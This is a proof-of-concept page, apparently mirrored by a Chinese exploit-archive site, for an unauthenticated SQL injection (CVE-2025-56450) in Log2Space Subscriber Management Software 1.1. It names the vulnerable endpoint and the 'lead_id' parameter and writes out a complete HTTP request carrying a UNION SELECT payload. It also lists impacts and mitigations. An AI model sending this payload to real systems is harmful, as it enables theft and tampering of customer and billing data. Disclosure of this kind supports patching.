POC详情: 0b3f615096e5e64962aab51e0eeba21cddf33089

来源
关联漏洞
标题: Spacecom Log2Space Subscriber Management Software 安全漏洞 (CVE-2025-56450)
描述:Spacecom Log2Space Subscriber Management Software是印度Spacecom公司的一个订阅用户管理软件。 Spacecom Log2Space Subscriber Management Software 1.1版本存在安全漏洞,该漏洞源于未对/l2s/api/selfcareLeadHistory端点中的lead_id参数进行验证和清理,可能导致SQL注入攻击。
描述
Unauthenticated SQL Injection in Log2Space Subscriber Management Software
介绍
# CVE-2025-56450
Unauthenticated SQL Injection in Log2Space Subscriber Management Software (Version 1.1)

**Overview:**

An unauthenticated SQL Injection vulnerability has been identified in the Log2Space Subscriber Management Software, specifically within the /l2s/api/selfcareLeadHistory API endpoint.
The flaw allows remote attackers to execute arbitrary SQL queries against the backend database without authentication

**Technical Details:**

POST /l2s/api/selfcareLeadHistory
Content-Type: multipart/form-data
Content-Disposition: form-data; name="lead_id"

**Vulnerable Parameter: lead_id**

**Example Exploit Payload**

POST /l2s/api/selfcareLeadHistory HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: xxx

------WebKitFormBoundary
Content-Disposition: form-data; name="lead_id"

1' UNION SELECT database(),version(),user()--
------WebKitFormBoundary--



<img width="960" height="364" alt="1 1" src="https://github.com/user-attachments/assets/bef52e64-4a7b-4412-83fb-664543e09f0a" />

<img width="960" height="432" alt="2" src="https://github.com/user-attachments/assets/d451ee3f-a1e2-42a5-957b-132f8a6a6ade" />


**Root Cause**

The lead_id parameter is directly concatenated into SQL queries without proper input validation or parameterized statements.
This results in full SQL injection vulnerability, allowing attackers to:

1. Enumerate database schemas and table names
2. Extract sensitive customer or billing data
3. Execute stacked queries
4. Potentially achieve remote code execution depending on DB configuration

**Impact**

1. Attackers can extract sensitive customer data from the database.
2. Under certain configurations, SQL injection can lead to remote code execution.
3. Attackers can manipulate or delete customer and billing data.

**Mitigation**

1. Implement parameterized queries (prepared statements) for all database operations.
2. Enforce strict input validation and sanitization on all user-supplied data.
3. Disable verbose SQL error messages in production environments.
4. Disable verbose SQL error messages in production environments.


文件快照

[4.0K] /data/pocs/0b3f615096e5e64962aab51e0eeba21cddf33089 └── [2.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。